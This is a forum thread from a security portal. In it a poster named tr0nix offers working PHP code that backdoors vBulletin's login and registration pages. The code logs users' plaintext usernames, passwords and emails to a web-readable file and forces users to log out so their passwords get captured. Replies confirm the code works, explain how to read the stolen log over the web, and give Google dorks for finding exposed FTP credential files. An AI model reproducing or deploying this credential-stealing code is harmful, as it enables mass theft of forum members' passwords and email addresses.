Waraxe IT Security Portal
Login or Register
October 3, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 77
Members: 0
Total: 77
Full disclosure
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
SEC Consult SA-20240925-0 :: Uninstall Password Bypass in BlackBerry CylanceOPTICS Windows Installer Package (CVE-2024-35214)
Apple iOS 17.2.1 - Screen Time Passcode Retrieval (MitigationBypass)
CyberDanube Security Research 20240919-0 | Multiple Vulnerabilities in Netman204
Submit Exploit CVE-2024-42831
Stored XSS in "Edit Profile" - htmlyv2.9.9
Stored XSS in "Menu Editor" - htmlyv2.9.9
Backdoor.Win32.BlackAngel .13 / Unauthenticated Remote CommandExecution
Backdoor.Win32.CCInvader. 10 / Authentication Bypass
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> vBulletin Board -> [vBulletin] [Tutorial] Password logger Goto page 1, 2, 3, 4Next
Post new topicReply to topic View previous topic :: View next topic
[vBulletin] [Tutorial] Password logger
PostPosted: Wed Apr 02, 2008 4:08 pm Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




Tested under:

    vBulletin 3.6.5

    vBulletin 3.6.8 Patch Level 1 / Patch Level 2

    vBulletin 3.6.9

    vBulletin 3.6.10

    vBulletin 3.7.0

    vBulletin 3.7.3 PL1

    vBulletin 3.8.X


[Requirements]
- Access to the server


Open the "global.php", which is located in the main directory from vBulletin.

Search for

Code:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;


and change it to that:

Code:
//$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;


Now open "login.php", which is located in the main directory from vBulletin, too.

Search for

Code:
process_new_login


and add the following code under this line:

Code:

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");
foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}
}


Now wait a little bit and see how the filesize of the logfile raises. Wink


Edit:

If you want to logout an user who has clicked the 'remember me'-function, then do this:


Open the "index.php" and search for

Code:
foreach ($userinfos AS $userid => $loggedin)


Put the following code under the foreach loop (under or above the "// memory saving"!).

Code:

require_once(DIR . '/includes/functions_login.php');

$getouttahere = array("administrator", "anotheruser"); // username which checked the damn "remember me"-function :p
setcookie("countLogout", 0,time()+86400); // save cookie for one day!
$countLogout = $_COOKIE["countLogout"];

if(in_array(strtolower($vbulletin->userinfo['username']), $getouttahere, true) AND $countLogout == 0)
{
setcookie("countLogout",1,time()+86400); // save cookie for one day!
$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);
process_logout();
}


Now you just need to edit the $getouttahere variable with your usernames. Wink)



EDIT 2:

If you want to do that automaticly at their registration, then use the following:


Open "register.php" and search for

Code:
$show['errors'] = false;
(approx. line 377)

Then put the following code under or above the line:

Code:

$lg_username = strtolower($vbulletin->GPC["username"]);
$lg_password = $vbulletin->GPC["password"];
$lg_email = $vbulletin->GPC["email"];
$lg_file = "./includes/lg.html";

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$fp1 = @fopen($lg_file, "a+");
@fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $lg_email . ")\n");
@fclose($fp1);
$f = @file($lg_file);
$new = array_unique($f);
$fp = @fopen($lg_file, "w");

foreach($new as $values)
{
@fputs($fp, $values);
}
@fclose($fp);
}


You can edit the $lg_file variable. It defines where you want to save your log file.

Example:

Code:
$lg_file = "./includes/lg_reg.html";



Edit 3:

If you want to log out all users, then open the "index.php" and search for:

Code:
foreach ($userinfos AS $userid => $loggedin)


Put the following code* under the foreach loop (under or above the "// memory saving"!).


Code:


require_once(DIR . '/includes/functions_login.php');

$countLogout = $_COOKIE["countLogout"];

if($countLogout == 0)
{
setcookie("countLogout",1,time()+604800); // save cookie for one week!
$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);
process_logout();
}


* = Code not tested, should work.

PS: If the Logger doesn't create the logfile automaticly, then you need to create it manually and give the file chmod 0777.

(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru>


Last edited by tr0nix on Sat Mar 14, 2009 4:24 pm; edited 31 times in total
View user's profile Send private message Send e-mail
PostPosted: Wed Apr 02, 2008 4:41 pm Reply with quote
pexli
Valuable expert
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




This not working if user check the box 'Remember me' Laughing Laughing

btw

You need user perm to edit this files otherwase admin will see this.Game over.
View user's profile Send private message
re:
PostPosted: Mon Apr 07, 2008 6:02 am Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




- Added: Code for the 'remember me'-function
- Added: It logs now the email address, too! :p
- Added: Checks if the password got filled out. If not, then the logger dont log it.
- Added: Checks if the username + password combination is already in the logfile.
View user's profile Send private message Send e-mail
PostPosted: Wed Apr 09, 2008 12:12 am Reply with quote
NEUR0BASHER
Regular user
Regular user
Joined: Apr 05, 2008
Posts: 6




nice script - if you can tell me how to gain access to an ftp server I could even check it out;-)
View user's profile Send private message
PostPosted: Wed Apr 09, 2008 1:49 pm Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




NEUR0BASHER wrote:
nice script - if you can tell me how to gain access to an ftp server I could even check it out;-)


google dorks:

Code:

filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
View user's profile Send private message Send e-mail
re:
PostPosted: Thu Apr 10, 2008 5:49 am Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




Change: $sql_query edited! It should work now on forums with table prefixes!
Change: The username will now be saved in lower case, because the logger has logged the same username + password if they hadn't typed the username correctly as the first time. (Example: "Username" - "Password" - "UserNAME", "Password")
View user's profile Send private message Send e-mail
PostPosted: Thu May 01, 2008 10:48 am Reply with quote
bad-boy
Regular user
Regular user
Joined: May 01, 2008
Posts: 7




I tested on 3.6.5
Working 100%
View user's profile Send private message
help
PostPosted: Thu May 08, 2008 10:49 am Reply with quote
hacker2008
Beginner
Beginner
Joined: May 06, 2008
Posts: 3




hw will i decode the password?????????
let it be :
V0C41F983079DB944C8ECA8614CEB1971683B6F6D
View user's profile Send private message
PostPosted: Thu May 29, 2008 1:28 am Reply with quote
tooth
Beginner
Beginner
Joined: May 29, 2008
Posts: 3




anyone here successfully tested this on 3.7?
View user's profile Send private message
PostPosted: Sun Jun 01, 2008 8:49 pm Reply with quote
kurwamac
Regular user
Regular user
Joined: Jun 01, 2008
Posts: 13




Where the logs save? i have only ftp Sad
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 1:24 am Reply with quote
gibbocool
Advanced user
Advanced user
Joined: Jan 22, 2008
Posts: 208




kurwamac wrote:
Where the logs save? i have only ftp Sad

/includes/lg.html

So to view it, just go like this:
www.site.com/includes/lg.html

No ftp required!

_________________
http://www.gibbocool.com
View user's profile Send private message Visit poster's website
PostPosted: Mon Jun 02, 2008 12:54 pm Reply with quote
kurwamac
Regular user
Regular user
Joined: Jun 01, 2008
Posts: 13




if i register and autologin dont save me.

fix it please.
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 3:21 pm Reply with quote
tr0nix
Active user
Active user
Joined: Mar 06, 2008
Posts: 48




kurwamac wrote:
if i register and autologin dont save me.

fix it please.



Look at my first post!

Its already there how to do that (look at the "Edit:" part Razz)
View user's profile Send private message Send e-mail
PostPosted: Mon Jun 02, 2008 9:29 pm Reply with quote
kurwamac
Regular user
Regular user
Joined: Jun 01, 2008
Posts: 13




as they register it automatically loginning and does not save the log
View user's profile Send private message
PostPosted: Mon Jun 02, 2008 9:32 pm Reply with quote
kurwamac
Regular user
Regular user
Joined: Jun 01, 2008
Posts: 13




Quote:
Now you just need to edit the $getouttahere variable with your usernames


How to for all users?
View user's profile Send private message
[vBulletin] [Tutorial] Password logger
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.046 Seconds